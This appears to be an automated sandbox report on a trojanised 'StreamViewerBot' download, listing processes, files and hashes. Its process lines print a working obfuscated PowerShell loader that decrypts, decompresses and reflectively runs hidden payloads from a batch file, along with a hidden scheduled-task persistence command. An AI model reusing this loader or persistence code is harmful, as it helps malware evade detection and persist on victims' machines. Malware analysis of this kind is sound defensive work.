"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=2612 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=2720 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5700 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5524 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5992 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3936 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5252 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5064 --field-trial-handle=1804,i,368668545969028610,8117197097168615788,131072 /prefetch:2
C:\Users\Admin\Desktop\New folder\StreamViewerBot.exe
"C:\Users\Admin\Desktop\New folder\StreamViewerBot.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\New folder\it\x64.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('A8iFgIiE17M/9M+aFV4Edi/eXGKyPq9pU4lTC1/qxJk='); $aes_var.IV=[System.Convert]::FromBase64String('5bOKYfyfw/VmAfo64VNDgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xYBLR=New-Object System.IO.MemoryStream(,$param_var); $CLdbP=New-Object System.IO.MemoryStream; $BTxDq=New-Object System.IO.Compression.GZipStream($xYBLR, [IO.Compression.CompressionMode]::Decompress); $BTxDq.CopyTo($CLdbP); $BTxDq.Dispose(); $xYBLR.Dispose(); $CLdbP.Dispose(); $CLdbP.ToArray();}function execute_function($param_var,$param2_var){ $RZWgw=[System.Reflection.Assembly]::Load([byte[]]$param_var); $qKXCW=$RZWgw.EntryPoint; $qKXCW.Invoke($null, $param2_var);}$jMOVt = 'C:\Users\Admin\Desktop\New folder\it\x64.bat';$host.UI.RawUI.WindowTitle = $jMOVt;$TeqNc=[System.IO.File]::ReadAllText($jMOVt).Split([Environment]::NewLine);foreach ($CREjk in $TeqNc) { if ($CREjk.StartsWith('oItXkWqKiQezhOyZZOCD')) { $tNOkm=$CREjk.Substring(20); break; }}$payloads_var=[string[]]$tNOkm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_329_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo cls;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('A8iFgIiE17M/9M+aFV4Edi/eXGKyPq9pU4lTC1/qxJk='); $aes_var.IV=[System.Convert]::FromBase64String('5bOKYfyfw/VmAfo64VNDgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xYBLR=New-Object System.IO.MemoryStream(,$param_var); $CLdbP=New-Object System.IO.MemoryStream; $BTxDq=New-Object System.IO.Compression.GZipStream($xYBLR, [IO.Compression.CompressionMode]::Decompress); $BTxDq.CopyTo($CLdbP); $BTxDq.Dispose(); $xYBLR.Dispose(); $CLdbP.Dispose(); $CLdbP.ToArray();}function execute_function($param_var,$param2_var){ $RZWgw=[System.Reflection.Assembly]::Load([byte[]]$param_var); $qKXCW=$RZWgw.EntryPoint; $qKXCW.Invoke($null, $param2_var);}$jMOVt = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.bat';$host.UI.RawUI.WindowTitle = $jMOVt;$TeqNc=[System.IO.File]::ReadAllText($jMOVt).Split([Environment]::NewLine);foreach ($CREjk in $TeqNc) { if ($CREjk.StartsWith('oItXkWqKiQezhOyZZOCD')) { $tNOkm=$CREjk.Substring(20); break; }}$payloads_var=[string[]]$tNOkm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
C:\Users\Admin\Desktop\New folder\svb.exe
"C:\Users\Admin\Desktop\New folder\svb.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SYSTEM32\CMD.exe
"CMD.exe" /C explorer "https://github.com/gorkemhacioglu/Stream-Viewer-Bot/wiki/Configuration#:~:text=Your%20proxy%20list.%20You%20have%20to%20buy%20private%20proxies.
C:\Windows\explorer.exe
explorer "https://github.com/gorkemhacioglu/Stream-Viewer-Bot/wiki/Configuration#:~:text=Your%20proxy%20list.%20You%20have%20to%20buy%20private%20proxies.
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/gorkemhacioglu/Stream-Viewer-Bot/wiki/Configuration#:~:text=Your%20proxy%20list.%20You%20have%20to%20buy%20private%20proxies.
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff9fab3cb8,0x7fff9fab3cc8,0x7fff9fab3cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3272 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3628 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5852 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6580 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13350682092941172524,7818265298883568616,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6544 /prefetch:2
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.IrisService.AppXwt29n3t7x7q6fgyrrbbqxwzkqjfjaw4y.mca
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SYSTEM32\CMD.exe
"CMD.exe" /C taskkill /F /PID 5112
C:\Windows\system32\taskkill.exe
taskkill /F /PID 5112
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa399e055 /state1:0x41c64e6d
Network
Files
\??\pipe\crashpad_2720_HIHWKKAXHFHJLAEJ
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe57fe17.TMP
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\13e44177-7356-4fa8-88bb-da4ed985e20b.tmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000008
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
C:\Users\Admin\Downloads\StreamViewerBot-v24.03.15.zip:Zone.Identifier
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ngzkdbz5.fuu.ps1
C:\Users\Admin\Desktop\New folder\svb.exe:Zone.Identifier
C:\Users\Admin\Desktop\New folder\svb.exe
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.vbs
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_329.bat
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
memory/1756-593-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2704-597-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1740-598-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2496-594-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1164-592-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1140-590-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2476-599-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2484-606-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2848-607-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1276-608-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1880-609-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2660-610-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2056-611-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/3460-616-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1852-618-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/4020-617-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1052-619-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/1060-623-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/2036-622-0x00007FFF8F570000-0x00007FFF8F580000-memory.dmp
memory/4520-667-0x00007FFFADC70000-0x00007FFFAE732000-memory.dmp
C:\Users\Admin\Desktop\New folder\vshz2ot2.newcfg
| MD5 | 3c391361ba36eac1afc299297657b959 |
| SHA1 | 3b56be0810ad5e705c8186022b60f66579dc10a4 |
| SHA256 | 601d8e0c59b67804f2fda0f7a659d259a2c27833a4fb131491983ba0bcea4aa9 |
| SHA512 | a621fd253bf5f639b19874a6c9794f6756cad86973b688ce63c7dd55b3e6884d069847707c4e00cf043a3827ad039556021e03272c0d75638e141b9f52409135 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c1c7e2f451eb3836d23007799bc21d5f |
| SHA1 | 11a25f6055210aa7f99d77346b0d4f1dc123ce79 |
| SHA256 | 429a870d582c77c8a661c8cc3f4afa424ed5faf64ce722f51a6a74f66b21c800 |
| SHA512 | 2ca40bbbe76488dff4b10cca78a81ecf2e97d75cd65f301da4414d93e08e33f231171d455b0dbf012b2d4735428e835bf3631f678f0ab203383e315da2d23a34 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6876cbd342d4d6b236f44f52c50f780f |
| SHA1 | a215cf6a499bfb67a3266d211844ec4c82128d83 |
| SHA256 | ca5a6320d94ee74db11e55893a42a52c56c8f067cba35594d507b593d993451e |
| SHA512 | dff3675753b6b733ffa2da73d28a250a52ab29620935960673d77fe2f90d37a273c8c6afdf87db959bdb49f31b69b41f7aa4febac5bbdd43a9706a4dd9705039 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bb9214adaea197cef7a6fa1b958e210c |
| SHA1 | 4fabae95c012e2f934501191dfd9ab5dd6d8e5f9 |
| SHA256 | d7a8eec49e211231e87a03572f1c7c31c010b94cb31afbfacfd7724db6b441a8 |
